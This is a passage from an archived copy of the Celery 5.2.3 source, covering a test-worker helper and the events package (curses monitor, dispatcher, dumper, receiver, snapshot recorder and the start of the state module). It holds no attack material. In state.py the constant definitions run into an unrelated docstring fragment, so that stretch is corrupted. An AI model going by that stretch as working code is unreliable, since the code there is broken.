conn.default_channel.queue_declare worker = WorkController( app=app, concurrency=concurrency, hostname=anon_nodename(), pool=pool, loglevel=loglevel, logfile=logfile, # not allowed to override TestWorkController.on_consumer_ready ready_callback=None, without_heartbeat=kwargs.pop("without_heartbeat", True), without_mingle=True, without_gossip=True, **kwargs) t = threading.Thread(target=worker.start, daemon=True) t.start() worker.ensure_started() _set_task_join_will_block(False) yield worker from celery.worker import state state.should_terminate = 0 t.join(shutdown_timeout) if t.is_alive(): raise RuntimeError( "Worker thread failed to exit within the allocated timeout. " "Consider raising `shutdown_timeout` if your tasks take longer " "to execute." ) state.should_terminate = None @contextmanager def _start_worker_process(app, concurrency=1, pool='solo', loglevel=WORKER_LOGLEVEL, logfile=None, **kwargs): # type (Celery, int, str, Union[int, str], str, **Any) -> Iterable """Start worker in separate process. Yields: celery.app.worker.Worker: worker instance. """ from celery.apps.multi import Cluster, Node app.set_current() cluster = Cluster([Node('testworker1@%h')]) cluster.start() yield cluster.stopwait() def setup_app_for_worker(app, loglevel, logfile): # type: (Celery, Union[str, int], str) -> None """Setup the app to be used for starting an embedded worker.""" app.finalize() app.set_current() app.set_default() type(app.log)._setup = False app.log.setup(loglevel=loglevel, logfile=logfile) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4557507 celery-5.2.3/celery/events/0000775000175000017500000000000000000000000015464 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/__init__.py0000664000175000017500000000073500000000000017602 0ustar00asifasif00000000000000"""Monitoring Event Receiver+Dispatcher. Events is a stream of messages sent for certain actions occurring in the worker (and clients if :setting:`task_send_sent_event` is enabled), used for monitoring purposes. """ from .dispatcher import EventDispatcher from .event import Event, event_exchange, get_exchange, group_from from .receiver import EventReceiver __all__ = ( 'Event', 'EventDispatcher', 'EventReceiver', 'event_exchange', 'get_exchange', 'group_from', ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/cursesmon.py0000664000175000017500000004316500000000000020065 0ustar00asifasif00000000000000"""Graphical monitor of Celery events using curses.""" import curses import sys import threading from datetime import datetime from itertools import count from math import ceil from textwrap import wrap from time import time from celery import VERSION_BANNER, states from celery.app import app_or_default from celery.utils.text import abbr, abbrtask __all__ = ('CursesMonitor', 'evtop') BORDER_SPACING = 4 LEFT_BORDER_OFFSET = 3 UUID_WIDTH = 36 STATE_WIDTH = 8 TIMESTAMP_WIDTH = 8 MIN_WORKER_WIDTH = 15 MIN_TASK_WIDTH = 16 # this module is considered experimental # we don't care about coverage. STATUS_SCREEN = """\ events: {s.event_count} tasks:{s.task_count} workers:{w_alive}/{w_all} """ class CursesMonitor: # pragma: no cover """A curses based Celery task monitor.""" keymap = {} win = None screen_delay = 10 selected_task = None selected_position = 0 selected_str = 'Selected: ' foreground = curses.COLOR_BLACK background = curses.COLOR_WHITE online_str = 'Workers online: ' help_title = 'Keys: ' help = ('j:down k:up i:info t:traceback r:result c:revoke ^c: quit') greet = f'celery events {VERSION_BANNER}' info_str = 'Info: ' def __init__(self, state, app, keymap=None): self.app = app self.keymap = keymap or self.keymap self.state = state default_keymap = { 'J': self.move_selection_down, 'K': self.move_selection_up, 'C': self.revoke_selection, 'T': self.selection_traceback, 'R': self.selection_result, 'I': self.selection_info, 'L': self.selection_rate_limit, } self.keymap = dict(default_keymap, **self.keymap) self.lock = threading.RLock() def format_row(self, uuid, task, worker, timestamp, state): mx = self.display_width # include spacing detail_width = mx - 1 - STATE_WIDTH - 1 - TIMESTAMP_WIDTH uuid_space = detail_width - 1 - MIN_TASK_WIDTH - 1 - MIN_WORKER_WIDTH if uuid_space < UUID_WIDTH: uuid_width = uuid_space else: uuid_width = UUID_WIDTH detail_width = detail_width - uuid_width - 1 task_width = int(ceil(detail_width / 2.0)) worker_width = detail_width - task_width - 1 uuid = abbr(uuid, uuid_width).ljust(uuid_width) worker = abbr(worker, worker_width).ljust(worker_width) task = abbrtask(task, task_width).ljust(task_width) state = abbr(state, STATE_WIDTH).ljust(STATE_WIDTH) timestamp = timestamp.ljust(TIMESTAMP_WIDTH) row = f'{uuid} {worker} {task} {timestamp} {state} ' if self.screen_width is None: self.screen_width = len(row[:mx]) return row[:mx] @property def screen_width(self): _, mx = self.win.getmaxyx() return mx @property def screen_height(self): my, _ = self.win.getmaxyx() return my @property def display_width(self): _, mx = self.win.getmaxyx() return mx - BORDER_SPACING @property def display_height(self): my, _ = self.win.getmaxyx() return my - 10 @property def limit(self): return self.display_height def find_position(self): if not self.tasks: return 0 for i, e in enumerate(self.tasks): if self.selected_task == e[0]: return i return 0 def move_selection_up(self): self.move_selection(-1) def move_selection_down(self): self.move_selection(1) def move_selection(self, direction=1): if not self.tasks: return pos = self.find_position() try: self.selected_task = self.tasks[pos + direction][0] except IndexError: self.selected_task = self.tasks[0][0] keyalias = {curses.KEY_DOWN: 'J', curses.KEY_UP: 'K', curses.KEY_ENTER: 'I'} def handle_keypress(self): try: key = self.win.getkey().upper() except Exception: # pylint: disable=broad-except return key = self.keyalias.get(key) or key handler = self.keymap.get(key) if handler is not None: handler() def alert(self, callback, title=None): self.win.erase() my, mx = self.win.getmaxyx() y = blank_line = count(2) if title: self.win.addstr(next(y), 3, title, curses.A_BOLD | curses.A_UNDERLINE) next(blank_line) callback(my, mx, next(y)) self.win.addstr(my - 1, 0, 'Press any key to continue...', curses.A_BOLD) self.win.refresh() while 1: try: return self.win.getkey().upper() except Exception: # pylint: disable=broad-except pass def selection_rate_limit(self): if not self.selected_task: return curses.beep() task = self.state.tasks[self.selected_task] if not task.name: return curses.beep() my, mx = self.win.getmaxyx() r = 'New rate limit: ' self.win.addstr(my - 2, 3, r, curses.A_BOLD | curses.A_UNDERLINE) self.win.addstr(my - 2, len(r) + 3, ' ' * (mx - len(r))) rlimit = self.readline(my - 2, 3 + len(r)) if rlimit: reply = self.app.control.rate_limit(task.name, rlimit.strip(), reply=True) self.alert_remote_control_reply(reply) def alert_remote_control_reply(self, reply): def callback(my, mx, xs): y = count(xs) if not reply: self.win.addstr( next(y), 3, 'No replies received in 1s deadline.', curses.A_BOLD + curses.color_pair(2), ) return for subreply in reply: curline = next(y) host, response = next(subreply.items()) host = f'{host}: ' self.win.addstr(curline, 3, host, curses.A_BOLD) attr = curses.A_NORMAL text = '' if 'error' in response: text = response['error'] attr |= curses.color_pair(2) elif 'ok' in response: text = response['ok'] attr |= curses.color_pair(3) self.win.addstr(curline, 3 + len(host), text, attr) return self.alert(callback, 'Remote Control Command Replies') def readline(self, x, y): buffer = '' curses.echo() try: i = 0 while 1: ch = self.win.getch(x, y + i) if ch != -1: if ch in (10, curses.KEY_ENTER): # enter break if ch in (27,): buffer = '' break buffer += chr(ch) i += 1 finally: curses.noecho() return buffer def revoke_selection(self): if not self.selected_task: return curses.beep() reply = self.app.control.revoke(self.selected_task, reply=True) self.alert_remote_control_reply(reply) def selection_info(self): if not self.selected_task: return def alert_callback(mx, my, xs): my, mx = self.win.getmaxyx() y = count(xs) task = self.state.tasks[self.selected_task] info = task.info(extra=['state']) infoitems = [ ('args', info.pop('args', None)), ('kwargs', info.pop('kwargs', None)) ] + list(info.items()) for key, value in infoitems: if key is None: continue value = str(value) curline = next(y) keys = key + ': ' self.win.addstr(curline, 3, keys, curses.A_BOLD) wrapped = wrap(value, mx - 2) if len(wrapped) == 1: self.win.addstr( curline, len(keys) + 3, abbr(wrapped[0], self.screen_width - (len(keys) + 3))) else: for subline in wrapped: nexty = next(y) if nexty >= my - 1: subline = ' ' * 4 + '[...]' elif nexty >= my: break self.win.addstr( nexty, 3, abbr(' ' * 4 + subline, self.screen_width - 4), curses.A_NORMAL, ) return self.alert( alert_callback, f'Task details for {self.selected_task}', ) def selection_traceback(self): if not self.selected_task: return curses.beep() task = self.state.tasks[self.selected_task] if task.state not in states.EXCEPTION_STATES: return curses.beep() def alert_callback(my, mx, xs): y = count(xs) for line in task.traceback.split('\n'): self.win.addstr(next(y), 3, line) return self.alert( alert_callback, f'Task Exception Traceback for {self.selected_task}', ) def selection_result(self): if not self.selected_task: return def alert_callback(my, mx, xs): y = count(xs) task = self.state.tasks[self.selected_task] result = (getattr(task, 'result', None) or getattr(task, 'exception', None)) for line in wrap(result or '', mx - 2): self.win.addstr(next(y), 3, line) return self.alert( alert_callback, f'Task Result for {self.selected_task}', ) def display_task_row(self, lineno, task): state_color = self.state_colors.get(task.state) attr = curses.A_NORMAL if task.uuid == self.selected_task: attr = curses.A_STANDOUT timestamp = datetime.utcfromtimestamp( task.timestamp or time(), ) timef = timestamp.strftime('%H:%M:%S') hostname = task.worker.hostname if task.worker else '*NONE*' line = self.format_row(task.uuid, task.name, hostname, timef, task.state) self.win.addstr(lineno, LEFT_BORDER_OFFSET, line, attr) if state_color: self.win.addstr(lineno, len(line) - STATE_WIDTH + BORDER_SPACING - 1, task.state, state_color | attr) def draw(self): with self.lock: win = self.win self.handle_keypress() x = LEFT_BORDER_OFFSET y = blank_line = count(2) my, _ = win.getmaxyx() win.erase() win.bkgd(' ', curses.color_pair(1)) win.border() win.addstr(1, x, self.greet, curses.A_DIM | curses.color_pair(5)) next(blank_line) win.addstr(next(y), x, self.format_row('UUID', 'TASK', 'WORKER', 'TIME', 'STATE'), curses.A_BOLD | curses.A_UNDERLINE) tasks = self.tasks if tasks: for row, (_, task) in enumerate(tasks): if row > self.display_height: break if task.uuid: lineno = next(y) self.display_task_row(lineno, task) # -- Footer next(blank_line) win.hline(my - 6, x, curses.ACS_HLINE, self.screen_width - 4) # Selected Task Info if self.selected_task: win.addstr(my - 5, x, self.selected_str, curses.A_BOLD) info = 'Missing extended info' detail = '' try: selection = self.state.tasks[self.selected_task] except KeyError: pass else: info = selection.info() if 'runtime' in info: info['runtime'] = '{:.2f}'.format(info['runtime']) if 'result' in info: info['result'] = abbr(info['result'], 16) info = ' '.join( f'{key}={value}' for key, value in info.items() ) detail = '... -> key i' infowin = abbr(info, self.screen_width - len(self.selected_str) - 2, detail) win.addstr(my - 5, x + len(self.selected_str), infowin) # Make ellipsis bold if detail in infowin: detailpos = len(infowin) - len(detail) win.addstr(my - 5, x + len(self.selected_str) + detailpos, detail, curses.A_BOLD) else: win.addstr(my - 5, x, 'No task selected', curses.A_NORMAL) # Workers if self.workers: win.addstr(my - 4, x, self.online_str, curses.A_BOLD) win.addstr(my - 4, x + len(self.online_str), ', '.join(sorted(self.workers)), curses.A_NORMAL) else: win.addstr(my - 4, x, 'No workers discovered.') # Info win.addstr(my - 3, x, self.info_str, curses.A_BOLD) win.addstr( my - 3, x + len(self.info_str), STATUS_SCREEN.format( s=self.state, w_alive=len([w for w in self.state.workers.values() if w.alive]), w_all=len(self.state.workers), ), curses.A_DIM, ) # Help self.safe_add_str(my - 2, x, self.help_title, curses.A_BOLD) self.safe_add_str(my - 2, x + len(self.help_title), self.help, curses.A_DIM) win.refresh() def safe_add_str(self, y, x, string, *args, **kwargs): if x + len(string) > self.screen_width: string = string[:self.screen_width - x] self.win.addstr(y, x, string, *args, **kwargs) def init_screen(self): with self.lock: self.win = curses.initscr() self.win.nodelay(True) self.win.keypad(True) curses.start_color() curses.init_pair(1, self.foreground, self.background) # exception states curses.init_pair(2, curses.COLOR_RED, self.background) # successful state curses.init_pair(3, curses.COLOR_GREEN, self.background) # revoked state curses.init_pair(4, curses.COLOR_MAGENTA, self.background) # greeting curses.init_pair(5, curses.COLOR_BLUE, self.background) # started state curses.init_pair(6, curses.COLOR_YELLOW, self.foreground) self.state_colors = {states.SUCCESS: curses.color_pair(3), states.REVOKED: curses.color_pair(4), states.STARTED: curses.color_pair(6)} for state in states.EXCEPTION_STATES: self.state_colors[state] = curses.color_pair(2) curses.cbreak() def resetscreen(self): with self.lock: curses.nocbreak() self.win.keypad(False) curses.echo() curses.endwin() def nap(self): curses.napms(self.screen_delay) @property def tasks(self): return list(self.state.tasks_by_time(limit=self.limit)) @property def workers(self): return [hostname for hostname, w in self.state.workers.items() if w.alive] class DisplayThread(threading.Thread): # pragma: no cover def __init__(self, display): self.display = display self.shutdown = False super().__init__() def run(self): while not self.shutdown: self.display.draw() self.display.nap() def capture_events(app, state, display): # pragma: no cover def on_connection_error(exc, interval): print('Connection Error: {!r}. Retry in {}s.'.format( exc, interval), file=sys.stderr) while 1: print('-> evtop: starting capture...', file=sys.stderr) with app.connection_for_read() as conn: try: conn.ensure_connection(on_connection_error, app.conf.broker_connection_max_retries) recv = app.events.Receiver(conn, handlers={'*': state.event}) display.resetscreen() display.init_screen() recv.capture() except conn.connection_errors + conn.channel_errors as exc: print(f'Connection lost: {exc!r}', file=sys.stderr) def evtop(app=None): # pragma: no cover """Start curses monitor.""" app = app_or_default(app) state = app.events.State() display = CursesMonitor(state, app) display.init_screen() refresher = DisplayThread(display) refresher.start() try: capture_events(app, state, display) except Exception: refresher.shutdown = True refresher.join() display.resetscreen() raise except (KeyboardInterrupt, SystemExit): refresher.shutdown = True refresher.join() display.resetscreen() if __name__ == '__main__': # pragma: no cover evtop() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/dispatcher.py0000664000175000017500000002143300000000000020167 0ustar00asifasif00000000000000"""Event dispatcher sends events.""" import os import threading import time from collections import defaultdict, deque from kombu import Producer from celery.app import app_or_default from celery.utils.nodenames import anon_nodename from celery.utils.time import utcoffset from .event import Event, get_exchange, group_from __all__ = ('EventDispatcher',) class EventDispatcher: """Dispatches event messages. Arguments: connection (kombu.Connection): Connection to the broker. hostname (str): Hostname to identify ourselves as, by default uses the hostname returned by :func:`~celery.utils.anon_nodename`. groups (Sequence[str]): List of groups to send events for. :meth:`send` will ignore send requests to groups not in this list. If this is :const:`None`, all events will be sent. Example groups include ``"task"`` and ``"worker"``. enabled (bool): Set to :const:`False` to not actually publish any events, making :meth:`send` a no-op. channel (kombu.Channel): Can be used instead of `connection` to specify an exact channel to use when sending events. buffer_while_offline (bool): If enabled events will be buffered while the connection is down. :meth:`flush` must be called as soon as the connection is re-established. Note: You need to :meth:`close` this after use. """ DISABLED_TRANSPORTS = {'sql'} app = None # set of callbacks to be called when :meth:`enabled`. on_enabled = None # set of callbacks to be called when :meth:`disabled`. on_disabled = None def __init__(self, connection=None, hostname=None, enabled=True, channel=None, buffer_while_offline=True, app=None, serializer=None, groups=None, delivery_mode=1, buffer_group=None, buffer_limit=24, on_send_buffered=None): self.app = app_or_default(app or self.app) self.connection = connection self.channel = channel self.hostname = hostname or anon_nodename() self.buffer_while_offline = buffer_while_offline self.buffer_group = buffer_group or frozenset() self.buffer_limit = buffer_limit self.on_send_buffered = on_send_buffered self._group_buffer = defaultdict(list) self.mutex = threading.Lock() self.producer = None self._outbound_buffer = deque() self.serializer = serializer or self.app.conf.event_serializer self.on_enabled = set() self.on_disabled = set() self.groups = set(groups or []) self.tzoffset = [-time.timezone, -time.altzone] self.clock = self.app.clock self.delivery_mode = delivery_mode if not connection and channel: self.connection = channel.connection.client self.enabled = enabled conninfo = self.connection or self.app.connection_for_write() self.exchange = get_exchange(conninfo, name=self.app.conf.event_exchange) if conninfo.transport.driver_type in self.DISABLED_TRANSPORTS: self.enabled = False if self.enabled: self.enable() self.headers = {'hostname': self.hostname} self.pid = os.getpid() def __enter__(self): return self def __exit__(self, *exc_info): self.close() def enable(self): self.producer = Producer(self.channel or self.connection, exchange=self.exchange, serializer=self.serializer, auto_declare=False) self.enabled = True for callback in self.on_enabled: callback() def disable(self): if self.enabled: self.enabled = False self.close() for callback in self.on_disabled: callback() def publish(self, type, fields, producer, blind=False, Event=Event, **kwargs): """Publish event using custom :class:`~kombu.Producer`. Arguments: type (str): Event type name, with group separated by dash (`-`). fields: Dictionary of event fields, must be json serializable. producer (kombu.Producer): Producer instance to use: only the ``publish`` method will be called. retry (bool): Retry in the event of connection failure. retry_policy (Mapping): Map of custom retry policy options. See :meth:`~kombu.Connection.ensure`. blind (bool): Don't set logical clock value (also don't forward the internal logical clock). Event (Callable): Event type used to create event. Defaults to :func:`Event`. utcoffset (Callable): Function returning the current utc offset in hours. """ clock = None if blind else self.clock.forward() event = Event(type, hostname=self.hostname, utcoffset=utcoffset(), pid=self.pid, clock=clock, **fields) with self.mutex: return self._publish(event, producer, routing_key=type.replace('-', '.'), **kwargs) def _publish(self, event, producer, routing_key, retry=False, retry_policy=None, utcoffset=utcoffset): exchange = self.exchange try: producer.publish( event, routing_key=routing_key, exchange=exchange.name, retry=retry, retry_policy=retry_policy, declare=[exchange], serializer=self.serializer, headers=self.headers, delivery_mode=self.delivery_mode, ) except Exception as exc: # pylint: disable=broad-except if not self.buffer_while_offline: raise self._outbound_buffer.append((event, routing_key, exc)) def send(self, type, blind=False, utcoffset=utcoffset, retry=False, retry_policy=None, Event=Event, **fields): """Send event. Arguments: type (str): Event type name, with group separated by dash (`-`). retry (bool): Retry in the event of connection failure. retry_policy (Mapping): Map of custom retry policy options. See :meth:`~kombu.Connection.ensure`. blind (bool): Don't set logical clock value (also don't forward the internal logical clock). Event (Callable): Event type used to create event, defaults to :func:`Event`. utcoffset (Callable): unction returning the current utc offset in hours. **fields (Any): Event fields -- must be json serializable. """ if self.enabled: groups, group = self.groups, group_from(type) if groups and group not in groups: return if group in self.buffer_group: clock = self.clock.forward() event = Event(type, hostname=self.hostname, utcoffset=utcoffset(), pid=self.pid, clock=clock, **fields) buf = self._group_buffer[group] buf.append(event) if len(buf) >= self.buffer_limit: self.flush() elif self.on_send_buffered: self.on_send_buffered() else: return self.publish(type, fields, self.producer, blind=blind, Event=Event, retry=retry, retry_policy=retry_policy) def flush(self, errors=True, groups=True): """Flush the outbound buffer.""" if errors: buf = list(self._outbound_buffer) try: with self.mutex: for event, routing_key, _ in buf: self._publish(event, self.producer, routing_key) finally: self._outbound_buffer.clear() if groups: with self.mutex: for group, events in self._group_buffer.items(): self._publish(events, self.producer, '%s.multi' % group) events[:] = [] # list.clear def extend_buffer(self, other): """Copy the outbound buffer of another instance.""" self._outbound_buffer.extend(other._outbound_buffer) def close(self): """Close the event dispatcher.""" self.mutex.locked() and self.mutex.release() self.producer = None def _get_publisher(self): return self.producer def _set_publisher(self, producer): self.producer = producer publisher = property(_get_publisher, _set_publisher) # XXX compat ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/dumper.py0000664000175000017500000000605400000000000017337 0ustar00asifasif00000000000000"""Utility to dump events to screen. This is a simple program that dumps events to the console as they happen. Think of it like a `tcpdump` for Celery events. """ import sys from datetime import datetime from celery.app import app_or_default from celery.utils.functional import LRUCache from celery.utils.time import humanize_seconds __all__ = ('Dumper', 'evdump') TASK_NAMES = LRUCache(limit=0xFFF) HUMAN_TYPES = { 'worker-offline': 'shutdown', 'worker-online': 'started', 'worker-heartbeat': 'heartbeat', } CONNECTION_ERROR = """\ -> Cannot connect to %s: %s. Trying again %s """ def humanize_type(type): try: return HUMAN_TYPES[type.lower()] except KeyError: return type.lower().replace('-', ' ') class Dumper: """Monitor events.""" def __init__(self, out=sys.stdout): self.out = out def say(self, msg): print(msg, file=self.out) # need to flush so that output can be piped. try: self.out.flush() except AttributeError: # pragma: no cover pass def on_event(self, ev): timestamp = datetime.utcfromtimestamp(ev.pop('timestamp')) type = ev.pop('type').lower() hostname = ev.pop('hostname') if type.startswith('task-'): uuid = ev.pop('uuid') if type in ('task-received', 'task-sent'): task = TASK_NAMES[uuid] = '{}({}) args={} kwargs={}' \ .format(ev.pop('name'), uuid, ev.pop('args'), ev.pop('kwargs')) else: task = TASK_NAMES.get(uuid, '') return self.format_task_event(hostname, timestamp, type, task, ev) fields = ', '.join( f'{key}={ev[key]}' for key in sorted(ev) ) sep = fields and ':' or '' self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {fields}') def format_task_event(self, hostname, timestamp, type, task, event): fields = ', '.join( f'{key}={event[key]}' for key in sorted(event) ) sep = fields and ':' or '' self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {task} {fields}') def evdump(app=None, out=sys.stdout): """Start event dump.""" app = app_or_default(app) dumper = Dumper(out=out) dumper.say('-> evdump: starting capture...') conn = app.connection_for_read().clone() def _error_handler(exc, interval): dumper.say(CONNECTION_ERROR % ( conn.as_uri(), exc, humanize_seconds(interval, 'in', ' ') )) while 1: try: conn.ensure_connection(_error_handler) recv = app.events.Receiver(conn, handlers={'*': dumper.on_event}) recv.capture() except (KeyboardInterrupt, SystemExit): return conn and conn.close() except conn.connection_errors + conn.channel_errors: dumper.say('-> Connection lost, attempting reconnect') if __name__ == '__main__': # pragma: no cover evdump() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/event.py0000664000175000017500000000331000000000000017154 0ustar00asifasif00000000000000"""Creating events, and event exchange definition.""" import time from copy import copy from kombu import Exchange __all__ = ( 'Event', 'event_exchange', 'get_exchange', 'group_from', ) EVENT_EXCHANGE_NAME = 'celeryev' #: Exchange used to send events on. #: Note: Use :func:`get_exchange` instead, as the type of #: exchange will vary depending on the broker connection. event_exchange = Exchange(EVENT_EXCHANGE_NAME, type='topic') def Event(type, _fields=None, __dict__=dict, __now__=time.time, **fields): """Create an event. Notes: An event is simply a dictionary: the only required field is ``type``. A ``timestamp`` field will be set to the current time if not provided. """ event = __dict__(_fields, **fields) if _fields else fields if 'timestamp' not in event: event.update(timestamp=__now__(), type=type) else: event['type'] = type return event def group_from(type): """Get the group part of an event type name. Example: >>> group_from('task-sent') 'task' >>> group_from('custom-my-event') 'custom' """ return type.split('-', 1)[0] def get_exchange(conn, name=EVENT_EXCHANGE_NAME): """Get exchange used for sending events. Arguments: conn (kombu.Connection): Connection used for sending/receiving events. name (str): Name of the exchange. Default is ``celeryev``. Note: The event type changes if Redis is used as the transport (from topic -> fanout). """ ex = copy(event_exchange) if conn.transport.driver_type == 'redis': # quick hack for Issue #436 ex.type = 'fanout' if name != ex.name: ex.name = name return ex ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/receiver.py0000664000175000017500000001160600000000000017646 0ustar00asifasif00000000000000"""Event receiver implementation.""" import time from operator import itemgetter from kombu import Queue from kombu.connection import maybe_channel from kombu.mixins import ConsumerMixin from celery import uuid from celery.app import app_or_default from celery.utils.time import adjust_timestamp from .event import get_exchange __all__ = ('EventReceiver',) CLIENT_CLOCK_SKEW = -1 _TZGETTER = itemgetter('utcoffset', 'timestamp') class EventReceiver(ConsumerMixin): """Capture events. Arguments: connection (kombu.Connection): Connection to the broker. handlers (Mapping[Callable]): Event handlers. This is a map of event type names and their handlers. The special handler `"*"` captures all events that don't have a handler. """ app = None def __init__(self, channel, handlers=None, routing_key='#', node_id=None, app=None, queue_prefix=None, accept=None, queue_ttl=None, queue_expires=None): self.app = app_or_default(app or self.app) self.channel = maybe_channel(channel) self.handlers = {} if handlers is None else handlers self.routing_key = routing_key self.node_id = node_id or uuid() self.queue_prefix = queue_prefix or self.app.conf.event_queue_prefix self.exchange = get_exchange( self.connection or self.app.connection_for_write(), name=self.app.conf.event_exchange) if queue_ttl is None: queue_ttl = self.app.conf.event_queue_ttl if queue_expires is None: queue_expires = self.app.conf.event_queue_expires self.queue = Queue( '.'.join([self.queue_prefix, self.node_id]), exchange=self.exchange, routing_key=self.routing_key, auto_delete=True, durable=False, message_ttl=queue_ttl, expires=queue_expires, ) self.clock = self.app.clock self.adjust_clock = self.clock.adjust self.forward_clock = self.clock.forward if accept is None: accept = {self.app.conf.event_serializer, 'json'} self.accept = accept def process(self, type, event): """Process event by dispatching to configured handler.""" handler = self.handlers.get(type) or self.handlers.get('*') handler and handler(event) def get_consumers(self, Consumer, channel): return [Consumer(queues=[self.queue], callbacks=[self._receive], no_ack=True, accept=self.accept)] def on_consume_ready(self, connection, channel, consumers, wakeup=True, **kwargs): if wakeup: self.wakeup_workers(channel=channel) def itercapture(self, limit=None, timeout=None, wakeup=True): return self.consume(limit=limit, timeout=timeout, wakeup=wakeup) def capture(self, limit=None, timeout=None, wakeup=True): """Open up a consumer capturing events. This has to run in the main process, and it will never stop unless :attr:`EventDispatcher.should_stop` is set to True, or forced via :exc:`KeyboardInterrupt` or :exc:`SystemExit`. """ for _ in self.consume(limit=limit, timeout=timeout, wakeup=wakeup): pass def wakeup_workers(self, channel=None): self.app.control.broadcast('heartbeat', connection=self.connection, channel=channel) def event_from_message(self, body, localize=True, now=time.time, tzfields=_TZGETTER, adjust_timestamp=adjust_timestamp, CLIENT_CLOCK_SKEW=CLIENT_CLOCK_SKEW): type = body['type'] if type == 'task-sent': # clients never sync so cannot use their clock value _c = body['clock'] = (self.clock.value or 1) + CLIENT_CLOCK_SKEW self.adjust_clock(_c) else: try: clock = body['clock'] except KeyError: body['clock'] = self.forward_clock() else: self.adjust_clock(clock) if localize: try: offset, timestamp = tzfields(body) except KeyError: pass else: body['timestamp'] = adjust_timestamp(timestamp, offset) body['local_received'] = now() return type, body def _receive(self, body, message, list=list, isinstance=isinstance): if isinstance(body, list): # celery 4.0+: List of events process, from_message = self.process, self.event_from_message [process(*from_message(event)) for event in body] else: self.process(*self.event_from_message(body)) @property def connection(self): return self.channel.connection.client if self.channel else None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/snapshot.py0000664000175000017500000000633600000000000017705 0ustar00asifasif00000000000000"""Periodically store events in a database. Consuming the events as a stream isn't always suitable so this module implements a system to take snapshots of the state of a cluster at regular intervals. There's a full implementation of this writing the snapshots to a database in :mod:`djcelery.snapshots` in the `django-celery` distribution. """ from kombu.utils.limits import TokenBucket from celery import platforms from celery.app import app_or_default from celery.utils.dispatch import Signal from celery.utils.imports import instantiate from celery.utils.log import get_logger from celery.utils.time import rate from celery.utils.timer2 import Timer __all__ = ('Polaroid', 'evcam') logger = get_logger('celery.evcam') class Polaroid: """Record event snapshots.""" timer = None shutter_signal = Signal(name='shutter_signal', providing_args={'state'}) cleanup_signal = Signal(name='cleanup_signal') clear_after = False _tref = None _ctref = None def __init__(self, state, freq=1.0, maxrate=None, cleanup_freq=3600.0, timer=None, app=None): self.app = app_or_default(app) self.state = state self.freq = freq self.cleanup_freq = cleanup_freq self.timer = timer or self.timer or Timer() self.logger = logger self.maxrate = maxrate and TokenBucket(rate(maxrate)) def install(self): self._tref = self.timer.call_repeatedly(self.freq, self.capture) self._ctref = self.timer.call_repeatedly( self.cleanup_freq, self.cleanup, ) def on_shutter(self, state): pass def on_cleanup(self): pass def cleanup(self): logger.debug('Cleanup: Running...') self.cleanup_signal.send(sender=self.state) self.on_cleanup() def shutter(self): if self.maxrate is None or self.maxrate.can_consume(): logger.debug('Shutter: %s', self.state) self.shutter_signal.send(sender=self.state) self.on_shutter(self.state) def capture(self): self.state.freeze_while(self.shutter, clear_after=self.clear_after) def cancel(self): if self._tref: self._tref() # flush all received events. self._tref.cancel() if self._ctref: self._ctref.cancel() def __enter__(self): self.install() return self def __exit__(self, *exc_info): self.cancel() def evcam(camera, freq=1.0, maxrate=None, loglevel=0, logfile=None, pidfile=None, timer=None, app=None, **kwargs): """Start snapshot recorder.""" app = app_or_default(app) if pidfile: platforms.create_pidlock(pidfile) app.log.setup_logging_subsystem(loglevel, logfile) print(f'-> evcam: Taking snapshots with {camera} (every {freq} secs.)') state = app.events.State() cam = instantiate(camera, state, app=app, freq=freq, maxrate=maxrate, timer=timer) cam.install() conn = app.connection_for_read() recv = app.events.Receiver(conn, handlers={'*': state.event}) try: try: recv.capture(limit=None) except KeyboardInterrupt: raise SystemExit finally: cam.cancel() conn.close() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/state.py0000664000175000017500000006222600000000000017166 0ustar00asifasif00000000000000"""In-memory representation of cluster state. This module implements a data-structure used to keep track of the state of a cluster of workers and the tasks it is working on (by consuming events). For every event consumed the state is updated, so the state represents the state of the cluster at the time of the last event. Snapshots (:mod:`celery.events.snapshot`) can be used to take "pictures" of this state at regular intervals to for example, store that in a database. """ import bisect import sys import threading from collections import defaultdict from collections.abc import Callable from datetime import datetime from decimal import Decimal from itertools import islice from operator import itemgetter from time import time from typing import Mapping from weakref import WeakSet, ref from kombu.clocks import timetuple from kombu.utils.objects import cached_property from celery import states from celery.utils.functional import LRUCache, memoize, pass1 from celery.utils.log import get_logger __all__ = ('Worker', 'Task', 'State', 'heartbeat_expires') # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. # pylint: disable=too-many-function-args # For some reason pylint thinks ._event is a method, when it's a property. #: Set if running PyPy PYPY = hasattr(sys, 'pypy_version_info') #: The window (in percentage) is added to the workers heartbeat #: frequency. If the time between updates exceeds this window, #: then the worker is considered to be offline. HEARTBEAT_EXPIRE_WINDOW = 200 #: Max drift between event timestamp and time of event received #: before we alert that clocks may be unsynchronized. HEARTBEAT_DRIFT_MAX = 16 DRIFT_WARNING = ( "Substantial drift from %s may mean clocks are out of sync. Current drift is " "%s seconds. [orig: %s recv: %s]" ) logger = get_logger(__name__) warn = logger.warning R_STATE = '' R_WORKER = '>> add_tasks = state.tasks_by_type['proj.tasks.add'] while still supporting the method call:: >>> add_tasks = list(state.tasks_by_type( ... 'proj.tasks.add', reverse=True)) """ def __init__(self, fun, *args, **kwargs): self.fun = fun super().__init__(*args, **kwargs) def __call__(self, *args, **kwargs): return self.fun(*args, **kwargs) Callable.register(CallableDefaultdict) @memoize(maxsize=1000, keyfun=lambda a, _: a[0]) def 